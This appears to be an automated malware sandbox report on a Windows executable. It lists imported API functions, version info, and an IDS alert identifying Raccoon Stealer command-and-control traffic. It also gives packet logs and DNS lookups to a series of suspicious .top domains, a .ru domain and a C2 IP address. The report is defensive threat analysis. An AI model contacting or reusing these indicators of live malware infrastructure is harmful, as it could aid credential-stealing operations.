KERNEL32.dll | HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA
USER32.dll | GetCursorPos

Exports

Name | Ordinal | Address
@SetViceVariants@12 | 1 | 0x401000

Version Infos

Description | Data
InternalName | sajbmiamezu.ise
ProductVersion | 8.64.59.5
Copyright | Copyrighz (C) 2021, fudkagat
Translation | 0x0127 0x0081

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/27/21-19:34:17.246697 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
09/27/21-19:34:19.201894 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
09/27/21-19:35:20.921103 | TCP | 2033973 | ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) | 49843 | 80 | 192.168.2.6 | 194.180.174.100

Network Port Distribution

TCP Packets

                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858586073 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858628035 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858659983 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858679056 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858700991 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858721972 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858727932 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858746052 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858762980 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858777046 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858808041 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858815908 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858850002 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858892918 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913274050 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913305998 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913331032 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.913341045 CEST8049771194.147.85.186192.168.2.6

UDP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 27, 2021 19:33:18.406043053 CEST  49448  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:33:18.429265976 CEST  53  49448  8.8.8.8  192.168.2.6
Sep 27, 2021 19:33:49.409531116 CEST  60342  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:33:49.440653086 CEST  53  60342  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:07.191087008 CEST  61346  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:07.210633993 CEST  53  61346  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:13.728676081 CEST  51774  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:13.811065912 CEST  53  51774  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:14.093039036 CEST  56023  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:14.195302010 CEST  53  56023  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:14.222486973 CEST  58384  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:14.326502085 CEST  53  58384  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:14.364077091 CEST  60261  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:14.425928116 CEST  56061  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:14.465382099 CEST  53  60261  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:14.499425888 CEST  58336  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:14.510271072 CEST  53  56061  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:14.513314962 CEST  53  58336  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:14.524566889 CEST  53781  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:14.626837969 CEST  53  53781  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:14.644284964 CEST  54064  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:15.243505955 CEST  52811  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:15.281732082 CEST  55299  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:15.292186975 CEST  53  52811  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:15.295691967 CEST  53  55299  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:15.674627066 CEST  54064  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:16.203670979 CEST  63745  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:16.289499998 CEST  53  63745  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:16.719695091 CEST  54064  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:16.870421886 CEST  53  54064  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:16.881614923 CEST  50055  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:17.055546999 CEST  61374  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:17.071249962 CEST  53  61374  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:17.191394091 CEST  53  50055  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:17.246506929 CEST  53  54064  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:17.284881115 CEST  50339  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:17.385461092 CEST  53  50339  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:17.588907003 CEST  63307  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:17.871890068 CEST  49694  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:17.884668112 CEST  53  49694  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:18.220540047 CEST  53  63307  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:18.951180935 CEST  54982  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:18.963875055 CEST  53  54982  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:19.182679892 CEST  50010  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:19.186295033 CEST  63718  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:19.201778889 CEST  53  54064  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:19.263353109 CEST  53  50010  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:19.591423988 CEST  53  63718  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:21.452070951 CEST  62116  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:21.627041101 CEST  63816  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:21.640595913 CEST  53  63816  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:21.831391096 CEST  53  62116  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:22.066333055 CEST  55014  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:22.457231045 CEST  53  55014  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:23.565519094 CEST  62208  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:23.582813025 CEST  53  62208  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:23.821450949 CEST  57574  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:23.835047007 CEST  53  57574  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:27.722908020 CEST  51818  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:27.736285925 CEST  53  51818  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:28.389682055 CEST  56628  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:28.403305054 CEST  53  56628  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:28.775993109 CEST  60778  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:29.405194044 CEST  53  60778  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:29.709583998 CEST  53799  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:29.723232985 CEST  53  53799  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:30.043598890 CEST  54683  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:30.057070017 CEST  53  54683  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:35.739319086 CEST  59329  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:35.757567883 CEST  53  59329  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:38.179837942 CEST  64021  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:38.195090055 CEST  53  64021  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:38.515753031 CEST  56129  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:38.531582117 CEST  53  56129  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:43.727261066 CEST  58177  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:43.740174055 CEST  53  58177  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:44.071888924 CEST  50700  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:44.088499069 CEST  53  50700  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:44.423293114 CEST  54069  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:44.439909935 CEST  53  54069  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:44.889302969 CEST  61178  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:44.903294086 CEST  53  61178  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:45.152374029 CEST  57017  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:45.165852070 CEST  53  57017  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:45.385431051 CEST  56327  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:45.821141958 CEST  53  56327  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:46.020289898 CEST  50243  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:46.035063982 CEST  53  50243  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:46.076296091 CEST  62055  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:46.091289043 CEST  53  62055  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:46.325368881 CEST  61249  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:46.338222980 CEST  53  61249  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:46.647686958 CEST  65252  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:46.661124945 CEST  53  65252  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:46.989340067 CEST  64367  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:47.002038002 CEST  53  64367  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:48.320816994 CEST  55066  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:48.725550890 CEST  53  55066  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:49.245259047 CEST  60211  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:49.259675026 CEST  53  60211  8.8.8.8  192.168.2.6
Sep 27, 2021 19:34:49.517163992 CEST  56570  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:34:49.531271935 CEST  53  56570  8.8.8.8  192.168.2.6
Sep 27, 2021 19:35:01.172421932 CEST  58454  53  192.168.2.6  8.8.8.8
Sep 27, 2021 19:35:01.187031031 CEST  53  58454  8.8.8.8  192.168.2.6
Sep 27, 2021 19:35:01.561320066 CEST  55180  53  192.168.2.6  8.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:01.574778080 CEST53551808.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.386094093 CEST5872153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.766330004 CEST53587218.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:05.998267889 CEST5769153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.012435913 CEST53576918.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.355072975 CEST5294353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:06.368376970 CEST53529438.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:07.516406059 CEST5948953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:07.529788971 CEST53594898.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.006237030 CEST6402253192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.019428968 CEST53640228.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.409050941 CEST6002353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.422373056 CEST53600238.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.426815987 CEST5719353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.440402031 CEST53571938.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.885338068 CEST5024853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.898325920 CEST53502488.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.245388985 CEST6441353192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.258060932 CEST53644138.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.491678953 CEST6042953192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.507046938 CEST53604298.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.359608889 CEST6034553192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.373219013 CEST53603458.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:37.989953041 CEST5873053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.012115955 CEST53587308.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.026782990 CEST5383053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.045906067 CEST53538308.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.158591032 CEST5722653192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.180354118 CEST53572268.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.195486069 CEST5788053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.210144043 CEST6085053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.212959051 CEST53578808.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.249732018 CEST53608508.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.276437998 CEST5318753192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.290045977 CEST53531878.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.318586111 CEST5583053192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.331665039 CEST53558308.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.420869112 CEST5514553192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:38.444024086 CEST53551458.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:42.701020002 CEST6409153192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:42.736085892 CEST53640918.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:45.609464884 CEST5572853192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:45.626606941 CEST53557288.8.8.8192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:35:49.600155115 CEST5569453192.168.2.68.8.8.8
                                                                                                                                                                                                  Sep 27, 2021 19:35:49.643933058 CEST53556948.8.8.8192.168.2.6

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Sep 27, 2021 19:34:17.246696949 CEST | 192.168.2.6 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable
Sep 27, 2021 19:34:19.201894045 CEST | 192.168.2.6 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 19:34:14.093039036 CEST | 192.168.2.6 | 8.8.8.8 | 0x1917 | Standard query (0) | naghenrietti1.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.222486973 CEST | 192.168.2.6 | 8.8.8.8 | 0x205e | Standard query (0) | kimballiett2.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.364077091 CEST | 192.168.2.6 | 8.8.8.8 | 0x1183 | Standard query (0) | xadriettany3.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.499425888 CEST | 192.168.2.6 | 8.8.8.8 | 0x1e | Standard query (0) | jebeccallis4.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.524566889 CEST | 192.168.2.6 | 8.8.8.8 | 0x1e4e | Standard query (0) | nityanneron5.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.644284964 CEST | 192.168.2.6 | 8.8.8.8 | 0x9de7 | Standard query (0) | umayaniela6.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:15.674627066 CEST | 192.168.2.6 | 8.8.8.8 | 0x9de7 | Standard query (0) | umayaniela6.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:16.719695091 CEST | 192.168.2.6 | 8.8.8.8 | 0x9de7 | Standard query (0) | umayaniela6.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:16.881614923 CEST | 192.168.2.6 | 8.8.8.8 | 0x30b5 | Standard query (0) | lynettaram7.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:17.284881115 CEST | 192.168.2.6 | 8.8.8.8 | 0x1df1 | Standard query (0) | sadineyalas8.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:17.588907003 CEST | 192.168.2.6 | 8.8.8.8 | 0x55dc | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:18.951180935 CEST | 192.168.2.6 | 8.8.8.8 | 0x106 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:19.186295033 CEST | 192.168.2.6 | 8.8.8.8 | 0x7f59 | Standard query (0) | privacy-toolz-for-you-403.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:21.452070951 CEST | 192.168.2.6 | 8.8.8.8 | 0xc52f | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:22.066333055 CEST | 192.168.2.6 | 8.8.8.8 | 0x1505 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:23.565519094 CEST | 192.168.2.6 | 8.8.8.8 | 0x1105 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:23.821450949 CEST | 192.168.2.6 | 8.8.8.8 | 0xd0a4 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:28.775993109 CEST | 192.168.2.6 | 8.8.8.8 | 0xdeec | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:29.709583998 CEST | 192.168.2.6 | 8.8.8.8 | 0x2827 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:30.043598890 CEST | 192.168.2.6 | 8.8.8.8 | 0x14bb | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:38.179837942 CEST | 192.168.2.6 | 8.8.8.8 | 0x2d9a | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:38.515753031 CEST | 192.168.2.6 | 8.8.8.8 | 0x9ed4 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:43.727261066 CEST | 192.168.2.6 | 8.8.8.8 | 0x53e2 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:44.071888924 CEST | 192.168.2.6 | 8.8.8.8 | 0xe720 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:44.423293114 CEST | 192.168.2.6 | 8.8.8.8 | 0x7461 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:44.889302969 CEST | 192.168.2.6 | 8.8.8.8 | 0xcdec | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:45.152374029 CEST | 192.168.2.6 | 8.8.8.8 | 0x11b2 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:45.385431051 CEST | 192.168.2.6 | 8.8.8.8 | 0xf8a0 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:46.076296091 CEST | 192.168.2.6 | 8.8.8.8 | 0xa452 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:46.325368881 CEST | 192.168.2.6 | 8.8.8.8 | 0xeb48 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:46.647686958 CEST | 192.168.2.6 | 8.8.8.8 | 0x7644 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:46.989340067 CEST | 192.168.2.6 | 8.8.8.8 | 0xd8e1 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:48.320816994 CEST | 192.168.2.6 | 8.8.8.8 | 0x15ba | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:49.245259047 CEST | 192.168.2.6 | 8.8.8.8 | 0x7ba1 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:49.517163992 CEST | 192.168.2.6 | 8.8.8.8 | 0x8187 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:01.172421932 CEST | 192.168.2.6 | 8.8.8.8 | 0x94ed | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:01.561320066 CEST | 192.168.2.6 | 8.8.8.8 | 0xeed5 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:05.386094093 CEST | 192.168.2.6 | 8.8.8.8 | 0x2f8c | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:05.998267889 CEST | 192.168.2.6 | 8.8.8.8 | 0x44ae | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:06.355072975 CEST | 192.168.2.6 | 8.8.8.8 | 0xc836 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:07.516406059 CEST | 192.168.2.6 | 8.8.8.8 | 0xae09 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.006237030 CEST | 192.168.2.6 | 8.8.8.8 | 0x12d9 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.409050941 CEST | 192.168.2.6 | 8.8.8.8 | 0x7492 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.426815987 CEST | 192.168.2.6 | 8.8.8.8 | 0x189b | Standard query (0) | t.me | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:08.885338068 CEST | 192.168.2.6 | 8.8.8.8 | 0xa828 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:09.245388985 CEST | 192.168.2.6 | 8.8.8.8 | 0x4960 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:09.491678953 CEST | 192.168.2.6 | 8.8.8.8 | 0xe9f8 | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:12.359608889 CEST | 192.168.2.6 | 8.8.8.8 | 0x75ae | Standard query (0) | geenaldencia9.top | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:37.989953041 CEST | 192.168.2.6 | 8.8.8.8 | 0xb34e | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.026782990 CEST | 192.168.2.6 | 8.8.8.8 | 0xf975 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.158591032 CEST | 192.168.2.6 | 8.8.8.8 | 0x5775 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.195486069 CEST | 192.168.2.6 | 8.8.8.8 | 0x4880 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.210144043 CEST | 192.168.2.6 | 8.8.8.8 | 0x1176 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.276437998 CEST | 192.168.2.6 | 8.8.8.8 | 0x9c58 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.318586111 CEST | 192.168.2.6 | 8.8.8.8 | 0xd2d8 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:38.420869112 CEST | 192.168.2.6 | 8.8.8.8 | 0xf57f | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Sep 27, 2021 19:35:49.600155115 CEST | 192.168.2.6 | 8.8.8.8 | 0xe8fd | Standard query (0) | defeatwax.ru | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 19:34:14.195302010 CEST | 8.8.8.8 | 192.168.2.6 | 0x1917 | Name error (3) | naghenrietti1.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.326502085 CEST | 8.8.8.8 | 192.168.2.6 | 0x205e | Name error (3) | kimballiett2.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.465382099 CEST | 8.8.8.8 | 192.168.2.6 | 0x1183 | Name error (3) | xadriettany3.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.513314962 CEST | 8.8.8.8 | 192.168.2.6 | 0x1e | Name error (3) | jebeccallis4.top | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 19:34:14.626837969 CEST | 8.8.8.8 | 192.168.2.6 | 0x1e4e | Name error (3) | nityanneron5.top | none | none | A (IP address) | IN (0x0001)
